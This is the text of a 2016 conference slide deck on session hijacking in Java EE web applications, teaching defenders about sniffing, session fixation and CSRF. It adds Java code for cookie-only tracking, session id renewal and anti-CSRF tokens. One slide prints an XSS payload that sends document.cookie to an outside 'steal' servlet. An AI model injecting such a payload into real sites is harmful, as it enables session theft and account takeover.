1. The Hacker's Guide to Session Hijacking in Java EE
Patrycja Wegrzynowicz
CTO, Yonita, Inc.
JavaOne 2016
2-3. About Me
• 15+ years of professional experience
• Software engineer, architect, head of software R&D
• Author and speaker
  • JavaOne, Devoxx, JavaZone, TheServerSide Java Symposium, Jazoon, OOPSLA, ASE, others
• Top 10 Women in Tech 2016 in Poland
• Founder and CTO of Yonita
  • Bridge the gap between the industry and the academia
  • Automated detection and refactoring of software defects
  • Trainings and code reviews
  • Security, performance, concurrency, databases
• Twitter @yonlabs
9. What Is a Web Session?
• A session identifies interactions with one user
• Unique identifier associated with every request
  • Cookie
  • Header
  • Parameter
  • Hidden field
15. Demo: Session Exposed in URL
• I will log into the sample application
• I will post a link with my session id on Twitter
  • @yonlabs
• Hijack my session :)
16. How to Avoid Session Id in URL?
• Default: allows cookies and URL rewriting
  • Default cookie, fall back on URL rewriting
  • To embrace all users
    • Disabled cookies in a browser
• Disable URL rewriting in an app server
  • App server specific
• Tracking mode
  • Java EE 6, web.xml
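The tracking-mode setting written as a Servlet 3.0 listener, an added example that is not from the talk's demo applications; it also sets the cookie flags and cookie path that the best-practices slides later in this deck recommend. The class name is an assumption; the same settings can be declared in web.xml under <session-config> with <tracking-mode>COOKIE</tracking-mode> and <cookie-config>.

```java
import java.util.EnumSet;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
import javax.servlet.SessionCookieConfig;
import javax.servlet.SessionTrackingMode;
import javax.servlet.annotation.WebListener;

// Added example, not the talk's code. Servlet 3.0 API (Java EE 6); class name assumed.
@WebListener
public class SessionTrackingConfig implements ServletContextListener {

    @Override
    public void contextInitialized(ServletContextEvent sce) {
        ServletContext ctx = sce.getServletContext();

        // COOKIE only: the container never falls back to URL rewriting,
        // so response.encodeURL() stops appending ;jsessionid=... to links
        // and the id cannot end up in a posted link, a Referer or a proxy log.
        ctx.setSessionTrackingModes(EnumSet.of(SessionTrackingMode.COOKIE));

        // Flags for the session cookie (JSESSIONID) the container issues.
        SessionCookieConfig cookie = ctx.getSessionCookieConfig();
        cookie.setHttpOnly(true);   // not visible to document.cookie (limits theft via XSS)
        cookie.setSecure(true);     // sent over HTTPS only (nothing to sniff on cleartext HTTP)

        // Scope the cookie to this application instead of the whole host.
        String path = ctx.getContextPath();
        cookie.setPath(path.isEmpty() ? "/" : path);
    }

    @Override
    public void contextDestroyed(ServletContextEvent sce) {
        // nothing to release
    }
}
```

setSessionTrackingModes() must run while the context is still initializing, which is why it sits in a ServletContextListener rather than in a servlet.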
18. Session Sniffing
• How to find out a cookie?
  • e.g., network monitoring and packet sniffing
• How to use a cookie?
  • Browsers' plugins and add-ons (e.g., Cookie Manager for Firefox)
  • Intercepting proxy (e.g., OWASP ZAP)
  • DIY: write your own code
19. Demo: Session Sniffing
• You will log into the sample application
  • Any non-empty user name
  • Please, use meaningful names!
• I will monitor network traffic
  • tcpdump
• I will hijack one of your sessions
  • Cookie Manager
24. Session Exposure
• Transport
  • Unencrypted transport
• Client-side
  • XSS
  • Attacks on browsers/OS
• Server-side
  • Logs
  • Session replication
  • Memory dump
25-26. How to Steal a Session if Secure Transport Is Used?
Attack a client!
27. Demo: Session Grabbed by XSS
• JavaScript code to steal a cookie
• Servlet to log down stolen cookies
• Vulnerable application to be exploited via injected JavaScript code (XSS)
28. Demo: Session Grabbed by XSS
• I will store malicious JavaScript code in the app
  • Through writing an "opinion"
• Log into the vulnerable application
  • https://demo.yonita.com:8181/session-xss/
  • Any non-empty user name
  • Please, use meaningful names!
• Click the 'View others' opinions' page
• Wait until I hijack your session :)
29. JavaScript to Steal a Cookie
<script>
// hacker's service
theft = 'http://demo.yonita.com/steal/steal?cookie=';
// to bypass Same Origin Policy
image = new Image();
image.src = theft + document.cookie;
</script>
32-34. When Is a Session Created?
A. On storing an attribute in a session for the first time
B. On calling request.getSession(true)/() for the first time
  • HttpServletRequest::getSession(true)
  • HttpServletRequest::getSession()
  • an implicit session object on JSP pages
    • unless <%@ page session="false" %>
C. On a successful login
D. None of the above
35. Session Fixation: Scenario 1
• Hacker opens a web page of a system in a browser
  • JSP page: a new session initialized!
• Hacker writes down the session id
• Hacker leaves the browser open
• User comes and logs into the app
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session
36. Session Fixation: Scenario 2
• Hacker opens a web page of a system in a browser
  • JSP page: a new session initialized!
• Hacker prepares a link with the session id in URL
• Hacker tricks a user to click the link
  • e.g. sends an email with the link
• User clicks the link
  • Uses the session initialized by the hacker
• Hacker uses the written-down session id to hijack the user's session
37. Session Fixation: Solution
• Change the session ID after a successful login
  • more generally: escalation of privileges
38. Servlet 3.0/3.1 Spec
• Containers may create HTTP Session objects to track login state. If a developer creates a session while a user is not authenticated, and the container then authenticates the user, the session visible to developer code after login must be the same session object that was created prior to login occurring so that there is no loss of session information.
39. Session Fixation: Solution in Java EE
• Change the session ID after a successful login
  • more generally: escalation of privileges
• Java EE 7 (Servlet 3.1)
  • HttpServletRequest.changeSessionId()
• Java EE 6
  • HttpSession.invalidate()
  • HttpServletRequest.getSession(true)
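Both fixes from the slide in one login servlet, as an added example that is not the talk's demo code: after a successful programmatic login the Servlet 3.1 path calls changeSessionId(), and a helper shows the Servlet 3.0 (Java EE 6) way of invalidating and re-creating the session without losing its attributes. The URL mapping, parameter names and redirect target are assumptions.

```java
import java.io.IOException;
import java.util.Collections;
import java.util.HashMap;
import java.util.Map;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.HttpSession;

// Added example, not the talk's demo code. Mapping and parameter names are assumed.
@WebServlet("/login")
public class LoginServlet extends HttpServlet {

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        try {
            // Container-managed credential check (Servlet 3.0+ programmatic login).
            req.login(req.getParameter("username"), req.getParameter("password"));
        } catch (ServletException failed) {
            resp.sendError(HttpServletResponse.SC_UNAUTHORIZED);
            return;
        }
        // Privileges just escalated: an id the attacker may have fixed must not survive.
        // Servlet 3.1 (Java EE 7): same HttpSession object, new id, attributes kept.
        req.changeSessionId();
        resp.sendRedirect(req.getContextPath() + "/home");
    }

    // Servlet 3.0 (Java EE 6) has no changeSessionId(): call this in its place.
    // Copies the attributes, invalidates the old session and creates a fresh one.
    static HttpSession renewSessionServlet30(HttpServletRequest req) {
        Map<String, Object> saved = new HashMap<String, Object>();
        HttpSession old = req.getSession(false);
        if (old != null) {
            for (String name : Collections.list(old.getAttributeNames())) {
                saved.put(name, old.getAttribute(name));
            }
            old.invalidate();               // the pre-login id is now dead
        }
        HttpSession fresh = req.getSession(true);   // new id issued to the client
        for (Map.Entry<String, Object> e : saved.entrySet()) {
            fresh.setAttribute(e.getKey(), e.getValue());
        }
        return fresh;
    }
}
```

Whichever path applies, do the renewal at every privilege escalation, not only at the login form, and check how your container behaves on declarative login (slide 43 asks the same).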
40. Secure Session Management Best Practices
• Random, unpredictable session id
  • At least 16 characters
• Secure transport and storage of session id
  • Cookie preferred over URL rewriting
  • Cookie flags: secure, httpOnly
  • Don't use too broad cookie paths
• Consistent use of HTTPS
  • Don't mix HTTP and HTTPS under the same domain/cookie path
41. Consistent Use of HTTPS: Typical Errors
• Static content served as HTTP from the same domain name
• Pre-authenticated pages as HTTP, post-authenticated pages as HTTPS from the same domain name
• Login form as HTTPS, the rest as HTTP
  • GMail for a few years after its launch!
42. Secure Authentication Best Practices
• Session creation and destruction
  • New session id after login
  • Logout button
  • Session timeouts: 2”-5” for critical apps, 15”-30” for typical apps
• Detecting session anomalies
  • Basic heuristic: a session associated with the headers of the first request
  • The fingerprint of a first request: IP, User-Agent, ...
  • If they don't match, something's going on (invalidate!)
• OWASP ModSecurity Web Application Firewall
  • Rules for detecting common security attacks
43. Secure Authentication Best Practices cont.
• Java EE
  • Declarative authentication implemented using descriptors
  • Programmatic authentication
    • Annotations, HttpServletRequest: authenticate, login, logout
  • Advanced flows and requirements
    • Custom implementation
• Servlet 3.0 vs 3.1
  • the session visible to developer code after login must be the same session object that was created prior to login
  • Session fixation problem
    • 3.0: no way to change a session id!
    • 3.1: changeSessionId
• Check out the container implementations
  • Java EE 6 vs. Java EE 7
44. Secure Authentication Best Practices cont.
• My choice
  • Declarative authentication with Java EE 7
    • Check out your application server behavior!
  • Programmatic authentication with Java EE 6, or when an advanced flow is needed in Java EE 7
    • HttpServletRequest: authenticate, login, logout
  • Custom implementation
46. What If We Can't Steal a Cookie?
We can still use it!
47. Demo: CSRF to Use a Cookie
• I will log into the application
• Log into the application
  • https://demo.yonita.com:8181/session-csrf/
  • Any non-empty user name
  • Please, use meaningful names!
• Click the link and the button 'Click me'
  • https://demo.yonita.com:8181/attack-csrf/
• I will check my account balance :)
48. CSRF: Solution
• Use a unique token for each request
  • anti-CSRF token
• Remember about your web forms and REST services
  • POST requests
  • Other HTTP actions as needed
• Web framework dependent
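The anti-CSRF token as a framework-independent servlet filter, an added example that is not from the talk: a per-session random token is stored in the session, web forms send it back as a hidden field and REST clients as a header, and any state-changing request without a matching token is refused. The attribute, field and header names are assumptions.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.SecureRandom;
import java.util.Base64;
import javax.servlet.*;
import javax.servlet.annotation.WebFilter;
import javax.servlet.http.*;

// Added example, not the talk's code. Attribute, field and header names are assumed.
@WebFilter("/*")
public class CsrfTokenFilter implements Filter {
    static final String TOKEN = "csrf.token";      // session attribute and hidden-field name
    static final String HEADER = "X-CSRF-Token";   // header used by REST clients
    private static final SecureRandom RANDOM = new SecureRandom();

    static String newToken() {
        byte[] raw = new byte[32];                  // 256 random bits, unguessable by the attacker's page
        RANDOM.nextBytes(raw);
        return Base64.getUrlEncoder().withoutPadding().encodeToString(raw);
    }

    static boolean tokenMatches(String expected, String presented) {
        if (expected == null || presented == null) return false;
        return MessageDigest.isEqual(expected.getBytes(StandardCharsets.UTF_8),
                                     presented.getBytes(StandardCharsets.UTF_8));  // constant-time
    }

    @Override
    public void doFilter(ServletRequest request, ServletResponse response, FilterChain chain)
            throws IOException, ServletException {
        HttpServletRequest req = (HttpServletRequest) request;
        HttpSession session = req.getSession(false);
        String method = req.getMethod();
        boolean safe = "GET".equals(method) || "HEAD".equals(method) || "OPTIONS".equals(method);
        if (session != null && session.getAttribute(TOKEN) == null) {
            session.setAttribute(TOKEN, newToken()); // pages render it as <input type="hidden" name="csrf.token">
        }
        if (!safe) {   // the browser attached the cookie on its own; the token it cannot
            String expected = session == null ? null : (String) session.getAttribute(TOKEN);
            String presented = req.getHeader(HEADER);
            if (presented == null) presented = req.getParameter(TOKEN);
            if (!tokenMatches(expected, presented)) {
                ((HttpServletResponse) response).sendError(HttpServletResponse.SC_FORBIDDEN);
                return;
            }
        }
        chain.doFilter(request, response);
    }
    @Override public void init(FilterConfig filterConfig) { }
    @Override public void destroy() { }
}
```

This only protects the application if no state change is reachable via GET, which is the "other HTTP actions as needed" point on the slide.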